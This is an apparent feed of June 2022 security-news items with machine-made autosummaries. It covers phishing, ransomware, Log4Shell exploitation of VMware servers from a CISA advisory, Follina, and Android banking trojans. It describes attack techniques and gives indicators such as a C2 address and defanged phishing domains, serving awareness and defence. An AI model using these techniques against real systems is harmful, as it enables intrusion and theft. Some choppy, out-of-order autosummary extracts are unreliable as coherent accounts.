                2022-06-23 https://www.bleepingcomputer.com/news/security/new-metamask-phishing-campaign-uses-kyc-lures-to-steal-passphrases/
                A new phishing campaign is targeting users on Microsoft 365 while spoofing the popular MetaMask cryptocurrency wallet provider and attempting to steal recovery phrases. [...]

                Autosummary: MetaMask phishing site (Armorblox). The actual MetaMask domain is “metamask.io,” whereas the phishing page uses “metamask.io-integrated-status.com,” which could pass as genuine to unsuspecting users.


                Rogue cryptocurrency billboards go phishing for wallets

                financial
                2022-06-23 https://blog.malwarebytes.com/scams/2022/06/rogue-cryptocurrency-billboards-go-phishing-for-wallets/

                We take a look at reports of rogue cryptocurrency billboards out to phish wallet details from unwary victims.

                The post Rogue cryptocurrency billboards go phishing for wallets appeared first on Malwarebytes Labs.


                Autosummary: Sure enough: The screenshot is from a Discord channel, which says: "BE ALERT IF YOU ARE AT NFT NYC. Reports of scam billboards in NYC with QR codes leading to Wallet Drainer sites." The image below has nothing to do with #Binance❗️ The necessary legal proceedings have been initiated against the persons who are clearly engaged in fraudulent activity. #SAFU pic.twitter.com/znvJDLRP7v — Binance Türkiye (@Binance_Turkish) May 8, 2022. The tactic used here was to convince unwary investors to hand over their seed/recovery phrases. If you’re up to no good, and you know digital finance is filled with insecure coin-laden wallets and expensive jpegs, this is absolutely something you’re going to take an interest in.


                NHS warns of scam COVID-19 text messages

                financial
                2022-06-23 https://www.tripwire.com/state-of-security/featured/nhs-warns-scam-covid-19-text-messages/
                The UK's National Health Service has warned the public about a spate of fake messages, sent out as SMS text messages, fraudulently telling recipients that they have been exposed to the Omicron variant of COVID-19. Read more in my article on the Tripwire State of Security blog.

                Autosummary: One would imagine that the NHS is also reporting the scam websites to the NCSC so they can be shut down as quickly as possible, but – of course – opportunistic scammers will continue to create new domains, and send out more scam messages, for as long as they believe it will help them defraud innocent members of the public.


                Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug

                exploits
                2022-06-23 https://threatpost.com/fancy-bear-nuke-threat-lure/180056/
                The APT is pairing a known Microsoft flaw with a malicious document to load malware that nabs credentials from Chrome, Firefox and Edge browsers.

                Autosummary: As with the previous variant, the stealer’s main purpose is to steal data, including website credentials such as username, password and URL, from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. In other functionality, the recently seen variant is “almost identical” to the earlier one, “with just a few minor refactors and some additional sleep commands,” they added.


                CISA: Log4Shell exploits still being used to hack VMware servers

                exploits
                2022-06-23 https://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/
                CISA warned today that threat actors including state-backed hacking groups are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability. [...]



                Lithuania warns of rise in DDoS attacks against government sites

                government
                2022-06-23 https://www.bleepingcomputer.com/news/security/lithuania-warns-of-rise-in-ddos-attacks-against-government-sites/
                The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country. [...]



                Conti ransomware group’s pulse stops, but did it fake its own death?

                exploits ransomware
                2022-06-23 https://blog.malwarebytes.com/ransomware/2022/06/conti-ransomware-disappears-did-it-fake-its-own-death/

                The leak site essential to the operation of Conti ransomware has disappeared, but everything may not be as it appears.

                The post Conti ransomware group’s pulse stops, but did it fake its own death? appeared first on Malwarebytes Labs.


                Autosummary: However, while anything that stops Conti from terrorising businesses, schools, and hospitals is welcome, the disappearance of its leak site is unlikely to make potential ransomware victims any safer, sadly. As our May ransomware report revealed, despite the noise it generated from its attacks on Costa Rica, Conti’s activity was significantly depressed in May, while the activity of gangs with alleged links to Conti increased, driven largely by the rise of BlackBasta.


                AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems

                exploits ransomware
                2022-06-23 https://us-cert.cisa.gov/ncas/alerts/aa22-174a
                Original release date: June 23, 2022

                Summary

                Actions to take today:
                • Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
                • Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services.

                The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.

                Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.

                This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims’ networks.

                CI "

                Autosummary: The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds. This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). Log4Shell is a remote code execution vulnerability affecting the Apache® Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG. Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services. Note: this advisory uses the MITRE ATT&CK for Enterprise framework, version 11. [T1021.001] to multiple other hosts in the production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. Note: the second threat actor group had access to the organization's test and production environments, and on or around April 13, 2022, leveraged CVE-2022-22954 to implant the Dingo J-spy webshell.
                VMware made fixes available in December 2021 and confirmed exploitation in the wild on December 10, 2021.[1] Since December 2021, multiple cyber threat actor groups have exploited [T1190] Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access. When executed, two randomly named *.tmp files are written to the disk at the location C:\Users\<USER>\AppData\Local\Temp\ and the embedded executable attempts to connect to the hard-coded C2 server 192.95.20[.]8 over port 4443, a non-standard port [T1571].


                Scalper bots out of control in Israel, selling state appointments

                government
                2022-06-23 https://www.bleepingcomputer.com/news/security/scalper-bots-out-of-control-in-israel-selling-state-appointments/
                Out-of-control scalper bots have created havoc in Israel by registering public service appointments for various government services and then offering to sell them to disgruntled citizens. [...]



                Bugcrowd partners with SocialProof Security to protect clients against social engineering attacks

                exploits
                2022-06-23 https://www.helpnetsecurity.com/2022/06/24/bugcrowd-socialproof-security/

                Bugcrowd announced a strategic reseller partnership with SocialProof Security, furthering the company’s mission to keep customers a step ahead of evolving cyber threats. As part of the partnership, Bugcrowd will resell SocialProof Security’s services, including social engineering prevention training, protocol and practitioner workshops, and penetration testing. In addition to reselling social engineering services, Bugcrowd continues to innovate and invest in its award-winning Security Knowledge Platform with the most comprehensive suite of security solutions including bug … More

                The post Bugcrowd partners with SocialProof Security to protect clients against social engineering attacks appeared first on Help Net Security.

                "

                Autosummary: “Even with current elevated threat levels, many organizations are surprisingly unprepared for the threats from social engineering attacks, as we repeatedly find low awareness across organizations, outdated or inconsistent identity verification, and limited practitioner skill sets,” said Ashish Gupta, CEO of Bugcrowd. "


                Cato Networks detects and interrupts ransomware with network-based ransomware protection

                exploits ransomware
                2022-06-22 https://www.helpnetsecurity.com/2022/06/22/cato-sase-cloud/

                Cato Networks introduced network-based ransomware protection for the Cato SASE Cloud. Using heuristic algorithms and deep network insight, Cato detects and prevents the spread of ransomware across the enterprise without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation. “Ransomware protection has become job one for every CISO and CIO, but too often enterprise defense strategies remain vulnerable whether by threat actors bypassing endpoint defenses or by manipulating insiders to … More

                The post Cato Networks detects and interrupts ransomware with network-based ransomware protection appeared first on Help Net Security.

                "

                Autosummary: "


                How to keep your NFTs safe from scammers

                financial
                2022-06-22 https://www.helpnetsecurity.com/2022/06/22/keep-nfts-safe/

                According to Wikipedia, the first known non-fungible token (NFT) was created in 2014 and the first NFT project was launched in late 2015. It took a few more years and more projects for the concept to trickle into the consciousness of the general public, and then a few more for the massive investments into NFTs to follow. 2020 and 2021 saw hundreds of millions of dollars being spent on NFTs. The boom was obvious … More

                The post How to keep your NFTs safe from scammers appeared first on Help Net Security.

                "

                Autosummary: The boom was obvious but baffling to many, as buying an NFT of a piece of digital art – a song, a photo, a video, an in-game collectible item, etc. – does not mean that you get copyright, intellectual property, or other legal rights to the digital asset the NFT represents. If you’re unsure, you should visit the respective NFT projects’ social media accounts or Discord to validate these claims, but I can assure you that in 9 out of 10 cases, these are simply scams designed to pilfer your digital wallets.” "


                RIG Exploit Kit Now Infects Victims' PCs With Dridex Instead of Raccoon Stealer

                exploits
                2022-06-22 https://thehackernews.com/2022/06/rig-exploit-kit-now-infects-victims-pcs.html
                The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022. The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in "

                Autosummary: "


                Europol Busts Phishing Gang Responsible for Millions in Losses

                financial
                2022-06-22 https://thehackernews.com/2022/06/europol-busts-phishing-gang-responsible.html
                Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation, which involved law enforcement authorities from Belgium and the Netherlands, saw the arrests of nine individuals in the Dutch nation. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and "

                Autosummary: "


                Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer

                exploits
                2022-06-22 https://securityaffairs.co/wordpress/132498/malware/rig-exploit-kit-dridex.html

                Threat actors are using the Rig Exploit Kit to spread the Dridex banking trojan instead of the Raccoon Stealer malware. Since January 2022, the Bitdefender Cyber Threat Intelligence Lab observed operators behind the RIG Exploit Kit pushing the Dridex banking trojan instead of the Raccoon Stealer. The switch occurred in February when Raccoon Stealer temporarily halted […]

                The post Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer appeared first on Security Affairs.

                "

                Autosummary: The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email clients like Thunderbird, Outlook, and Foxmail. "


                Flagstar Bank discloses a data breach that impacted 1.5 Million individuals

                financial
                2022-06-22 https://securityaffairs.co/wordpress/132490/data-breach/flagstar-bank-data-breach.html

                US Flagstar Bank disclosed a data breach that exposed files containing the personal information of 1.5 million individuals. US-based Flagstar Bank disclosed a data breach that impacted roughly 1.5 million individuals, but the company did not share details about the attack. The security breach took place in early December 2021, and the investigation that was […]

                The post Flagstar Bank discloses a data breach that impacted 1.5 Million individuals appeared first on Security Affairs.

                "

                Autosummary: "


                Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine

                exploits
                2022-06-22 https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html
                The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism "

                Autosummary: "


                Chinese hackers target script kiddies with info-stealer trojan

                exploits
                2022-06-22 https://www.bleepingcomputer.com/news/security/chinese-hackers-target-script-kiddies-with-info-stealer-trojan/
                Cybersecurity researchers have discovered a new campaign attributed to the Chinese "Tropic Trooper" hacking group, which employs a novel loader called Nimbda and a new variant of the Yahoyah trojan. [...] "

                Autosummary: The SMS Bomber GUI tool (Check Point). In the background, the loader injects shellcode into the notepad process to reach a GitHub repository, fetch an obfuscated executable, decode it, and then run it via process hollowing in "dllhost.exe." "


                Cybercriminals Use Azure Front Door in Phishing Attacks

                financial
                2022-06-21 https://securityaffairs.co/wordpress/132458/cyber-crime/azure-front-door-phishing.html

                Experts identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. Resecurity, Inc. (USA) has identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. The identified resources in one of the malicious campaigns impersonate various services […]

                The post Cybercriminals Use Azure Front Door in Phishing Attacks appeared first on Security Affairs.

                "

                Autosummary: Cybersecurity researchers from Resecurity identified multiple domains used in the new wave of phishing attacks dating back to the beginning of June – some of which are obviously hard to differentiate from legitimate correspondence due to their naming and reference to Azure Front Door, which only adds more complexity for defenders:
                – gridapisignout[.]azurefd[.]net
                – amazon-uk[.]azurefd[.]net
                – webmailsign[.]azurefd[.]net
                – onlinesigninlogin[.]azurefd[.]net
                – owasapisloh[.]azurefd[.]net
                – docuslgn-micros0ft983-0873878383[.]azurefd[.]net
                Based on the analysis performed on services such as URLSCAN, some instances of this campaign began around the month of March 2022 and were focused primarily on Japan and hosted on Kagoya VPS resources. Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, Azure Front Door) "


                Former Amazon Employee Found Guilty in 2019 Capital One Data Breach

                financial
                2022-06-21 https://thehackernews.com/2022/06/former-amazon-employee-found-guilty-in.html
                A 36-year-old former Amazon employee was convicted of wire fraud and computer intrusions in the U.S. for her role in the theft of personal data of no fewer than 100 million people in the 2019 Capital One breach. Paige Thompson, who operated under the online alias "erratic" and worked for the tech giant till 2016, was found guilty of wire fraud, five counts of unauthorized access to a protected "

                Autosummary: "She wanted data, she wanted money, and she wanted to brag," Assistant U.S. Attorney Andrew Friedman told the jury in the closing arguments, according to a press statement from the Justice Department. "


                Voicemail Scam Steals Microsoft Credentials

                financial
                2022-06-21 https://threatpost.com/voicemail-phishing-scam-steals-microsoft-credentials/180005/
                Attackers are targeting a number of key vertical markets in the U.S. with the active campaign, which impersonates the organization and Microsoft to lift Office365 and Outlook log-in details. "

                Autosummary: Other victims of the latest campaign include organizations in specific U.S. verticals, including software security, the military, security solution providers, healthcare and pharmaceutical, and the manufacturing supply chain, researchers said. "


                Mitigate Ransomware in a Remote-First World

                exploits ransomware
                2022-06-21 https://thehackernews.com/2022/06/mitigate-ransomware-in-remote-first.html
                Ransomware has been a thorn in the side of cybersecurity teams for years. With the move to remote and hybrid work, this insidious threat has become even more of a challenge for organizations everywhere. 2021 was a case study in ransomware due to the wide variety of attacks, significant financial and economic impact, and diverse ways that organizations responded. These attacks should be seen as a "

                Autosummary: If anything, these threat actors have made their operations an enterprise, creating scalable, repeatable, and profitable campaigns. Hybrid work has forced organizations to introduce a bring-your-own-device (BYOD) model, which means unmanaged personal devices have access to sensitive data. Because smartphones and tablets are used for both work and personal reasons, employees can be targeted through multiple apps such as SMS, social media platforms, and third-party messaging apps. "


                Modern IT Security Teams’ Inevitable Need for Advanced Vulnerability Management

                exploits
                2022-06-21 https://threatpost.com/modern-it-security-teams-inevitable-need-for-advanced-vulnerability-management/180018/
                Traditional vulnerability management programs are outdated, with little to no innovation in the last two decades. Today's dynamic IT environment demands an advanced vulnerability management program to deal with the complex attack surface and curb security risks. "

                Autosummary: It manages a wide array of security risks, including software vulnerabilities, asset exposure, missing patches, misconfigurations, deviation in security controls, and security posture anomalies from a single place. Advanced Vulnerability Management with a unified approach, integrated remediation, end-to-end automation, and a broader approach to vulnerabilities and risks will level up your vulnerability management game, enabling you to keep attacks at bay. Numerous security risks exist, such as a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies. "


                Office 365 Config Loophole Opens OneDrive, SharePoint Data to Ransomware Attack

                exploits ransomware
                2022-06-21 https://threatpost.com/office-365-opens-ransomware-attacks-on-onedrive-sharepoint/180010/
                A reported "potentially dangerous piece of functionality" allows an attacker to launch an attack on cloud infrastructure and ransom files stored in SharePoint and OneDrive. "

                Autosummary: “In some cases, the attacker may exfiltrate the unencrypted files as part of a double extortion tactic,” said researchers. Microsoft Responds: When asked, Microsoft commented “the configuration functionality for versioning settings within lists is working as intended,” according to Proofpoint. Those files, stored via “auto-save” and backed up in the cloud, typically leave end users with the impression data is shielded from a ransomware attack. "


                Phishing gang behind millions in losses dismantled by police

                financial
                2022-06-21 https://www.bleepingcomputer.com/news/security/phishing-gang-behind-millions-in-losses-dismantled-by-police/
                Members of a phishing gang behind millions of euros in losses were arrested today following a law enforcement operation coordinated by Europol. [...] "

                Autosummary: "


                Voicemail-themed phishing attacks target organisations

                financial
                2022-06-21 https://grahamcluley.com/voicemail-themed-phishing-attacks-targets-organisations/
                Have you received an email notification that there is a voicemail waiting to be listened to by you? Maybe you would be wise to think carefully before clicking on the attachment. "

                Autosummary: "


                Phishing awareness training: Help your employees avoid the hook

                financial
                2022-06-21 https://www.welivesecurity.com/2022/06/21/phishing-awareness-training-help-employees-avoid-hook/

                Educating employees about how to spot phishing attacks can strike a much-needed blow for network defenders

                The post Phishing awareness training: Help your employees avoid the hook appeared first on WeLiveSecurity

                "

                Autosummary: These tactics include:
                - Spoofed sender IDs/domains/phone numbers, sometimes using typosquatting or internationalized domain names (IDNs)
                - Hijacked sender accounts, which are often very difficult to spot as phishing attempts
                - Online research (via social media) to make targeted spearphishing attempts more convincing
                - Use of official logos, headers, footers
                - Creating a sense of urgency or excitement that rushes the user into making a decision
                - Shortened links that hide the sender’s true destination
                These could lead to:
                - Ransomware downloads
                - Banking Trojans
                - Data theft/breaches
                - Cryptojacking malware
                - Botnet deployments
                - Account takeovers for use in follow-on attacks
                - Business email compromise (BEC) resulting in money lost to scam invoices/payment requests
                The financial and reputational repercussions are immense.
                - Entertaining lessons that use positive reinforcement rather than fear-based messages
                - Real-world simulation exercises that can be tweaked by IT staff to reflect evolving phishing campaigns
                - Continuous training sessions throughout the year in short bite-sized lessons of no more than 15 minutes
                - Coverage for all employees including temps, contractors and senior executives. "


                Russian govt hackers hit Ukraine with Cobalt Strike, CredoMap malware

                exploits
                2022-06-21 https://www.bleepingcomputer.com/news/security/russian-govt-hackers-hit-ukraine-with-cobalt-strike-credomap-malware/
                The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons. [...] "

                Autosummary: CredoMap infection process (CERT-UA). This vulnerability is a flaw in the Microsoft Diagnostic Tool, exploited in the wild since at least April 2022, triggering malicious downloads by simply opening a document file, or in the case of RTFs, merely viewing it in the Windows preview pane. "


                Seemplicity appoints René Bonvanie to its Board of Directors

                government
                2022-06-21 https://www.helpnetsecurity.com/2022/06/22/seemplicity-rene-bonvanie/

                Seemplicity announced that René Bonvanie has joined as a member of its board. René brings decades of executive leadership experience to Seemplicity and will provide the company with operational and go-to-market guidance as it expands in North America. The appointment comes following René’s participation in Seemplicity’s recent funding rounds. René, the former Chief Marketing Officer at Palo Alto Networks for over 10 years, was a key player in the cybersecurity company’s growth to a multi-billion … More

                The post Seemplicity appoints René Bonvanie to its Board of Directors appeared first on Help Net Security.

                "

                Autosummary: He has over 35 years of experience in product marketing, business development, management, and board positions in the high-tech industry including positions at Oracle, Salesforce, SAP, and more. "


                BRATA Android Malware Gains Advanced Mobile Threat Capabilities

                exploits
                2022-06-20 https://thehackernews.com/2022/06/brata-android-malware-gains-advanced.html
                The operators behind BRATA have once again added more capabilities to the Android mobile malware in an attempt to make their attacks against financial apps more stealthy. "In fact, the modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern," Italian cybersecurity firm Cleafy said in a report last week. "This term is used to describe an attack campaign in which "

                Autosummary: "


                QNAP NAS devices hit by DeadBolt and ech0raix ransomware

                exploits ransomware
                2022-06-20 https://www.helpnetsecurity.com/2022/06/20/qnap-nas-deadbolt-ech0raix/

                Taiwan-based QNAP Systems is warning consumers and organizations using their network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign. There also appears to be a new ech0raix/QNAPCrypt campaign in progress, according to various sources, though QNAP is yet to comment on that. NAS devices are ideal targets: NAS devices are mostly used by consumers and small-to-medium businesses to store, manage and share files and backups. This makes them a tempting target for criminals wielding … More

                The post QNAP NAS devices hit by DeadBolt and ech0raix ransomware appeared first on Help Net Security.

                "

                Autosummary: Attackers generally focus on hitting QNAP and Synology NAS devices, but those by other manufacturers (Western Digital, Seagate, Zyxel, etc.) are also occasionally targeted. "


                Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild

                exploits
                2022-06-20 https://thehackernews.com/2022/06/google-researchers-detail-5-year-old.html
                A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero. The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to "

                Autosummary: "


                BRATA Android Malware evolves and targets the UK, Spain, and Italy

                exploits
                2022-06-20 https://securityaffairs.co/wordpress/132425/malware/brata-android-malware-evolution.html

                The developers behind the BRATA Android malware have implemented additional features to avoid detection. The operators behind the BRATA Android malware have implemented more features to make their attacks stealthy. The malware was first spotted in 2019 by security experts at Kaspersky; the name BRATA comes from ‘Brazilian RAT Android,’ because at the time it was used to […]

                The post BRATA Android Malware evolves and targets the UK, Spain, and Italy appeared first on Security Affairs.

                "

                Autosummary: "


                LinkedIn scams are a “significant threat”, warns FBI

                financial
                2022-06-20 https://blog.malwarebytes.com/scams/2022/06/linkedin-scams-are-a-significant-threat-warns-fbi/

                The FBI has issued a warning about cryptocurrency scams on LinkedIn. We see what the scammers are up to and how you can avoid them.

                The post LinkedIn scams are a “significant threat”, warns FBI appeared first on Malwarebytes Labs.

                "

                Autosummary: In fact, according to Sean Ragan, the FBI’s special agent in charge of the San Francisco and Sacramento, California, field offices, cryptocurrency scams are big business on LinkedIn. This may include sending cash directly, cryptocurrency, gift cards, prizes, and other winnings. "


                Do You Have Ransomware Insurance? Look at the Fine Print

                exploits ransomware
                2022-06-20 https://thehackernews.com/2022/06/do-you-have-ransomware-insurance-look.html
                Insurance exists to protect the insured party against catastrophe, but the insurer needs protection so that its policies are not abused – and that's where the fine print comes in. However, in the case of ransomware insurance, the fine print is becoming contentious and arguably undermining the usefulness of ransomware insurance. In this article, we'll outline why, particularly given the current "

                Autosummary: The claim ended up in court a short while later, but it took over three years for the court to come to a decision – ruling in Merck's favor on this occasion, stating that Ace American, like many other insurers, has not sufficiently changed the wording in its policy exclusions to ensure that the insured – Merck – fully understood that a cyberattack launched in the context of an act of war would mean that the policy coverage is not valid. However, when the company tried to claim on its USD 1.75bn "all-risk" insurance policy, Ace American initially refused to pay the claim, arguing that it was subject to an "Acts of War" exclusion clause. When an organization suffers from a ransomware attack, how does the insurer – or the claimant – prove that a specific organization was behind an attack, and by consequence, what the motivation for the attack was – e.g. war? In this article, we'll outline why, particularly given the current climate, war exclusion clauses are increasingly rendering ransomware insurance of reduced value – and why your organization should focus on protecting itself instead. "


                Google expert detailed a 5-Year-Old flaw in Apple Safari exploited in the wild

                exploits
                2022-06-20 https://securityaffairs.co/wordpress/132446/hacking/apple-safari-zero-day-2016.html

                Google Project Zero experts disclosed details of a 5-Year-Old Apple Safari flaw actively exploited in the wild. Researchers from the Google Project Zero team have disclosed details of a vulnerability in Apple Safari that was actively exploited in the wild. The vulnerability, tracked as CVE-2022-22620, was fixed for the first time in 2013, but in […]

                The post Google expert detailed a 5-Year-Old flaw in Apple Safari exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22620 (CVSS score: 8.8), in the WebKit affecting iOS, iPadOS, macOS, and Safari that may have been actively exploited in the wild. "


                Flagstar Bank discloses data breach impacting 1.5 million customers

                financial
                2022-06-20 https://www.bleepingcomputer.com/news/security/flagstar-bank-discloses-data-breach-impacting-15-million-customers/
                Flagstar Bank is notifying 1.5 million customers of a data breach where hackers accessed personal data during a December cyberattack. [...] "

                Autosummary: Samples of stolen data, including names, SSNs, addresses, tax records, and phone numbers, were eventually published on Clop’s data leak site. "


                How to get Fortune 500 cybersecurity without the hefty price tag

                ciber
                2022-06-20 https://grahamcluley.com/feed-sponsor-solcyber/
                Graham Cluley Security News is sponsored this week by the folks at SolCyber. Thanks to the great team there for their support! If the bad guys aren’t discriminating who they are attacking, how can your business settle for anything less than Fortune 500 level security? SolCyber has brought to market a new way to consume … Continue reading "How to get Fortune 500 cybersecurity without the hefty price tag" "

                Autosummary: "


                Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS

                exploits ransomware
                2022-06-19 https://securityaffairs.co/wordpress/132410/cyber-crime/ech0raix-ransomware-attacks.html

                Experts warn of a new ech0raix ransomware campaign targeting QNAP Network Attached Storage (NAS) devices. Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warn of a new wave of ech0raix ransomware attacks targeting QNAP Network Attached Storage (NAS) devices. The ransomware, tracked by Intezer as “QNAPCrypt” and “eCh0raix” by Anomali, is […]

                The post Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS appeared first on Security Affairs.

                "

                Autosummary: "


                Android-wiping BRATA malware is evolving into a persistent threat

                exploits
                2022-06-19 https://www.bleepingcomputer.com/news/security/android-wiping-brata-malware-is-evolving-into-a-persistent-threat/
                The threat actors operating the BRATA banking trojan have evolved their tactics and incorporated new information-stealing features into their malware. [...] "

                Autosummary: The BRATA evolution: BRATA started as a banking trojan in Brazil in 2019, able to perform screen capturing, install new apps, and turn off the screen to make the device appear powered down. "


                Critical flaw in Ninja Forms WordPress Plugin actively exploited in the wild

                exploits
                2022-06-19 https://securityaffairs.co/wordpress/132417/hacking/wordpress-ninja-forms-flaw.html

                A critical vulnerability in the Ninja Forms plugin potentially impacted more than one million WordPress websites. In mid-June, the Wordfence Threat Intelligence team noticed a back-ported security update in the popular WordPress plugin Ninja Forms, which has over one million active installations. The analysis of the updates revealed that they patched a code injection vulnerability […]

                The post Critical flaw in Ninja Forms WordPress Plugin actively exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: "


                Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners

                exploits ransomware
                2022-06-18 https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html
                A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads. In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner "

                Autosummary: "


                MaliBot Android Banking Trojan targets Spain and Italy

                financial exploits
                2022-06-18 https://securityaffairs.co/wordpress/132387/hacking/malibot-android-malware.html

                Malibot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted a new strain of Android malware, named Malibot, that is targeting online banking and cryptocurrency wallet customers in Spain and Italy. The experts documented attacks against multiple banks, including UniCredit, Santander, CaixaBank, and CartaBCC. […]

                The post MaliBot Android Banking Trojan targets Spain and Italy appeared first on Security Affairs.



                QNAP NAS devices targeted by surge of eCh0raix ransomware attacks

                exploits ransomware
                2022-06-18 https://www.bleepingcomputer.com/news/security/qnap-nas-devices-targeted-by-surge-of-ech0raix-ransomware-attacks/
                This week a new series of eCh0raix ransomware attacks has started targeting vulnerable QNAP Network Attached Storage (NAS) devices, according to user reports and sample submissions on the ID-Ransomware platform. [...]



                New phishing attack infects devices with Cobalt Strike

                financial
                2022-06-18 https://www.bleepingcomputer.com/news/security/new-phishing-attack-infects-devices-with-cobalt-strike/
                Security researchers have noticed a new malicious spam campaign that delivers the "Matanbuchus" malware to drop Cobalt Strike beacons on compromised machines. [...]

                Autosummary: In the background, two Matanbuchus DLL payloads ("main.dll") are dropped in two different locations, a scheduled task is created to maintain persistence across system reboots, and communication with the command and control (C2) server is established.


                Criminal IP analysis report on zero-day vulnerability in Atlassian Confluence

                exploits
                2022-06-17 https://www.helpnetsecurity.com/2022/06/17/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/

                According to Volexity, a webshell was discovered in Atlassian Confluence server during an incident response investigation. Volexity determined that it was a zero-day vulnerability that could execute remote code even after the latest patch was completed and reported the issue to Atlassian. After receiving the issue report and identifying it as a zero-day, Atlassian issued a security advisory for the critical unauthenticated remote code execution. Timeline (based on PDT) May 31: Volexity found zero-day vulnerability … More

                The post Criminal IP analysis report on zero-day vulnerability in Atlassian Confluence appeared first on Help Net Security.


                Autosummary: One of the 15 Confluence zero-day exploit cases released by Volexity is detected as a VPN on Criminal IP. Conclusion: On June 3rd, 2022, Atlassian released a patch for CVE-2022-26134. Webshell that was also used for MS Exchange Server attacks: According to Volexity, attackers could exploit CVE-2022-26134 to upload a webshell, particularly the China Chopper, a notorious security vulnerability issue that was also used during the last Microsoft Exchange Server crisis.


